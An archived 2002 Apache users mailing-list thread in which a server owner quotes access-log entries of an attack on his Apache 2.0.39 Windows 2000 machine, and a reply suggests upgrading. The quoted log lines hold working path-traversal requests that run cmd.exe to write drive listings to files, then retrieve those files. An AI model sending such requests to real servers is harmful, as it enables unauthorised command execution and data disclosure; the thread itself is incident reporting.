Mailing-List: contact users-help@httpd.apache.org; run by ezmlm
Precedence: bulk
Reply-To: users@httpd.apache.org
Message-Id: <sdca38ac.040@hamail.harlingen.tstc.edu>
Date: Thu, 07 Nov 2002 09:55:49 -0600
From: "craig franke" <craig.franke@harlingen.tstc.edu>
To: <users@httpd.apache.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Subject: Re: [users@httpd] Security hole with Apache 2.0.39 & Win2K?

Not sure if it is a hack... but you should probably upgrade to 2.0.43 =
unless you have a good reason not to... I believe there were some =
vulnerabilities pertaining to Windows in some of the versions between =
2.0.39 and 2.0.43...

Craig

>>> jere@iki.fi 11/07/02 09:31AM >>>

Greetings!

I'm sorry if this is something that has already been discussed, I just=20
joined the list. I tried to check out on this matter, but didn't find =
any=20
info elsewhere.

I found some suspicious stuff from my computer. First, there were files=20
named dirc.txt...dirg.txt in the root of my C:\ -drive. Plus, there was =
a=20
copy of Windows' cmd.exe renamed as root.exe
The txt files contained the root dir listings for the drives.

Then, I found this from my Apache log:

p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:49 +0300] "GET=20
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?=
/c+dir+c:>>c:\dirc.txt=20
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"=20
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:52 +0300] "GET=20
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?=
/c+dir+d:>>c:\dird.txt=20
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"=20
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:53 +0300] "GET=20
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?=
/c+dir+e:>>c:\dire.txt=20
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"=20
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:55 +0300] "GET=20
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?=
/c+dir+f:>>c:\dirf.txt=20
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"=20
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:56 +0300] "GET=20
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?=
/c+dir+g:>>c:\dirg.txt=20
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"=20
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:58 +0300] "GET=20
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirc.txt HTTP/1.1" 200 =
2237=20
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0=20
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:01 +0300] "GET=20
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdird.txt HTTP/1.1" 200 0=20
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0=20
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:03 +0300] "GET=20
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdire.txt HTTP/1.1" 200 0=20
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0=20
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:05 +0300] "GET=20
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirf.txt HTTP/1.1" 200 0=20
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0=20
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:07 +0300] "GET=20
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirg.txt HTTP/1.1" 200 0=20
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0=20
(compatible; MSIE 6.0; Windows NT 5.1)"

Then I surfed to the address mentioned in the HTTP request, finding what =
is=20
apparently some pages of a german speaking hacker (cracker?). You can =
type=20
in an IP address and you can see the directory listings for the root =
drives=20
for that machine. Seems it works at least with Apache 2.0.39 and Win2K =
that=20
I'm running. Or was, took it offline when I found this out.

So the question is, what is all this? Have I forgotten some installation=20=

trick or what? I'm not that worried about the dir listing, but are =
there=20
more harmful things that can be done this way?

No viruses on my computer, I'm running Symantec antivirus, database =
just=20
updated. Also, ZoneAlarm should keep most of the unwanted guests away.

Thanks for any help,
Jere


--=20
Jere Knuuttila      They took one look at me and said, "Oh my god",
jere@iki.fi         get a haircut and get a real job!
+358 50 585 3949                         George Thorogood - Haircut
http://jere.iki.fi=20


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org=20
   "   from the digest: users-digest-unsubscribe@httpd.apache.org=20
For additional commands, e-mail: users-help@httpd.apache.org=20


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org